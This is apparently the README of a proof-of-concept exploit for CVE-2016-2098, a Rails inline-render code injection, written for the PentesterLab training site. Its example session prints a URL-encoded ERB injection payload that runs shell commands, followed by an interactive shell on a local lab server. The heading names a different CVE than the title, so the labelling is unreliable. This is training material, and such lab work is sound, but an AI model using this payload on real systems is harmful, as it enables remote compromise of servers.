A PoC of CVE-2016-2098 I made for PentesterLab # CVE-2016-10033-PoC
Wrote this for PentesterLab
> If you are from PentesterLab's don't cheat, it's alot better to learn.
Hope it's useful to someone, if not to me in the future :)
Has interactive shell, nice argparse stuff asw
## Usage
```
usage: script.py [-h] --url URL [--param PARAM] [--proxy] [--raw] [--no-color]
script.py: error: the following arguments are required: --url
```
## Example
```bash
$ python3 script.py --url "http://localhost:8000/pages?id=test"
[+] No parameter specified. Available parameters: ['id']
[+] Testing parameter: id
[+] Testing injection with URL: http://localhost:8000/pages?id[inline]=%3C%25%3D%20%25x%28echo%20SEALLDEV_OUTPUT_%24%28id%29%29%20%25%3E
[+] Injection successful! Test output: uid=1000(webrick) gid=1000(webrick) groups=1000(webrick)
[+] Starting interactive shell...
[+] Type "exit" to quit
--------------------------------------------------
shell> whoami
webrick
```
[4.0K] /data/pocs/ef1c651540049f5fb0972e755466d533fb7b0e5c
├── [ 34K] LICENSE
├── [ 928] README.md
├── [ 88] requirements.txt
└── [5.9K] script.py
0 directories, 4 files